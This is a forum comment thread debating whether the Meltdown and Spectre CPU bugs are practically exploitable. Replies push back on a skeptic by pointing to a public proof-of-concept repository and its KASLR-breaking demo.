These two bugs (Meltdown and Spectr) are really very speculative things. It is like when human beings became aware of astroid orbits they thought that earth is in danger of being hit by one. Now that is indeed a theoritical possibility but what are the chances? These two bugs have been existent for 20 years and there is no known exploits of them. In the GitHub demos also they mention that the demos will work only if "For this demo, you either need the direct physical map offset (e.g. from demo #2) or you have to disable KASLR by specifying nokaslr in your kernel command line." - So you basically start with a broken system to exploit these bugs.

  • firethief 8 years ago

    This is literally a PoC. It's too late for the standard "I can't imagine how to exploit this so surely it cannot be done" fallacy. You are looking at an example of how to do it.

  • hannasanarion 8 years ago

    If you don't know the difference between the existence of an earthbound asteroid and the existence of people who write computer viruses, I don't know what to tell you.

  • andylei 8 years ago

    > For this demo, you either need the direct physical map offset (e.g. from demo #2)

    as in, demo #2 is a working exploit to get this map

  • dsfyu404ed 8 years ago

    >These two bugs have been existent for 20 years and there is no known exploits of them.

    They don't exactly leave behind a lot of telltale signs.

    This is also the kind of bug that is so broad (read access to everything on almost any machine you can execute code on) that a large subset of those equipped to discover it would have kept their mouths shut.

    > So you basically start with a broken system to exploit these bugs.

    A lot of systems were broken in the time before KASLR came along

  • voidmain 8 years ago

    Attacks are not asteroids: attackers constantly improve them to bypass improved defenses, and the "improbability" of an attack is no defense. Bypassing KASLR with these attacks is easy and real attackers will do it.

  • abritinthebay 8 years ago

    I think you're being harshly down-voted without people explaining why.

    For a start - this is hardly a remote possibility when we already have proof of concepts like the linked repo.

    Secondly - your analogy makes no sense. The only way to make it make sense is add that we also know there is an entire spacefaring group of mercenaries whose entire hobby and/or job is deliberately throwing asteroids in Earths general direction.

    • Skunkleton 8 years ago

      > The only way to make it make sense is add that we also know there is an entire spacefaring group of mercenaries whose entire hobby and/or job is deliberately throwing asteroids in Earths general direction.

      Maybe there is, but they are hilariously incompetent?

      • logfromblammo 8 years ago

        Nah, they're really far away, and there's an accumulated round-off error in their distance conversion between bloits (used by the client) and metrons (used by the subcontractor), so they're shooting at a target a quarter of a light-year away, and won't realize it for another 500 years.

      • abritinthebay 8 years ago

        This sounds like a new BlackAdder pitch...

        "Sir, I have a cunning plan" "Does it involve that legion of rabid space weasels again?" "... maybe."

        • Skunkleton 8 years ago

          As long as I can retire to my great big turnip in the country when it is all over I am happy.

  • philsnow 8 years ago

    you're being downvoted but the first non-trivial program `./kaslr` fetches the physical map offset of the running kernel: https://github.com/IAIK/meltdown/#demo-2-breaking-kaslr-kasl...

    Note they do say

    > This demo uses Meltdown to leak the (secret) randomization of the direct physical map. This demo requires root privileges to speed up the process. The paper describes a variant which does not require root privileges.

    but I don't know how much allowing it to sudo speeds up the process.

Keyboard Shortcuts

j
Next item
k
Previous item
o / Enter
Open selected item
?
Show this help
Esc
Close modal / clear selection